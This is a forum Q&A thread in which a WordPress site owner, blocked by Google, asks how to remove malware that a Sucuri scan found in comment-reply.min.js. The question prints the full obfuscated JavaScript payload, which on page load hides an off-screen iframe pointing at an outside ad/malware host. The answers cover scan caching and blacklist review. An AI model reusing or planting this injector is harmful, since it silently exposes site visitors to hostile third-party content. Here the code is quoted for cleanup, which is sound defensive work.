# How do I fix reported attack page?

Tags: javascript, wordpress, malware, safe-browsing

My WordPress site is being blocked by Google as a malicious site. After much research, I found Sucuri and ran a scan:

https://sitecheck.sucuri.net/results/www.zuzu.com

Issue is listed as follows:

ISSUE DETECTED- Website Malware

DEFINITION- mwjs-iframe-injected530?web.js.malware.pwframe.001

INFECTED URL http://www.zuzu.com/wp-includes/js/comment-reply.min.js?ver=f1397b4577f4eac1e6712291231852a5

Payload:

Known javascript malware. Details: http://labs.sucuri.net/db/malware/mwjs-iframe-injected530?web.js.malware.pwframe.001 var
_0xdc56=["\x6F\x6E\x6C\x6F\x61\x64","\x67\x65\x74\x44\x61\x74\x65","\x73\x65\x74\x44\x61\x74\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","","\x3D\x28\x5B\x5E\x3B\x5D\x29\x7B\x31\x2C\x7D","\x65\x78\x65\x63","\x73\x70\x6C\x69\x74","\x61\x64\x2D\x63\x6F\x6F\x6B\x69\x65","\x65\x72\x32\x76\x64\x72\x35\x67\x64\x63\x33\x64\x73","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x61\x74\x69\x63\x2E\x74\x72\x79\x6D\x79\x66\x69\x6E\x67\x65\x72\x2E\x77\x65\x62\x73\x69\x74\x65\x2F\x61\x64\x2F\x3F\x69\x64\x3D\x36\x39\x34\x33\x36\x33\x31\x26\x6B\x65\x79\x77\x6F\x72\x64\x3D","\x26\x61\x64\x76\x65\x72\x74\x3D\x55\x48\x68\x75\x79\x34","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x3C\x64\x69\x76\x20\x73\x74\x79\x6C\x65\x3D\x27\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x31\x30\x30\x30\x3B\x74\x6F\x70\x3A\x2D\x31\x30\x30\x30\x70\x78\x3B\x6C\x65\x66\x74\x3A\x2D\x39\x39\x39\x39\x70\x78\x3B\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27","\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];window[_0xdc56[0]]=function(){function
_0x739ex1(_0x739ex2,_0x739ex3,_0x739ex4){if(_0x739ex4){var _0x739ex5= new Date();_0x739ex5_0xdc56[2];};if(_0x739ex2&&_0x739ex3){document[_0xdc56[3]]=_0x739ex2+_0xdc56[4]+_0x739ex3+(_0x739ex4?_0xdc56[5]+_0x739ex5_0xdc56[6]:_0xdc56[7])}else {return false};}function _0x739ex6(_0x739ex2){var _0x739ex3= new RegExp(_0x739ex2+_0xdc56[8]);var
_0x739ex4=_0x739ex3_0xdc56[9];if(_0x739ex4){_0x739ex4=_0x739ex4[0]_0xdc56[10]}else {return false};return _0x739ex4[1]?_0x739ex4[1]:false;}var
_0x739ex7=_0x739ex6(_0xdc56[11]);if(_0x739ex7!=_0xdc56[12]){_0x739ex1(_0xdc56[11],_0xdc56[12],1);var
_0x739ex8=document_0xdc56[14];var _0x739ex9=925365;var _0x739exa=_0xdc56[15]+_0x739ex9+_0xdc56[16];_0x739ex8[_0xdc56[17]]=_0xdc56[18]+_0x739exa+_0xdc56[19];document[_0xdc56[21]]_0xdc56[20];};};

What do I need to do next to remove this malware?

Comment: I found the malicious code in comment-reply.min.js and removed it. I have been running the Sucuri scan since and it still shows the error. Does Sucuri not update the site status in real-time?

Answer (score 1, accepted):

Sucuri Sitecheck is just showing a cached response. It stores scans for 24 hours. There is a small link at the bottom of the results which you can click to Force a Re-scan. All it shows now is that the site is still blacklisted with Google.

You can use => https://sucuri.net/website-security/google-blacklisted-my-website    for some info and steps to remove the blacklist. Feel free to reach out to Sucuri for help or any questions.

Comment: Thanks, TRU177. Yeah, I figured that out after poking around a little. Hours later, I still see site listed as blacklisted in Google Search Console and Sucuri, but there are no error/malware notifications on Sucuri anymore. I am assuming it'll take about 72 hours for Google to review and update site status. I've already submitted the review request to Google.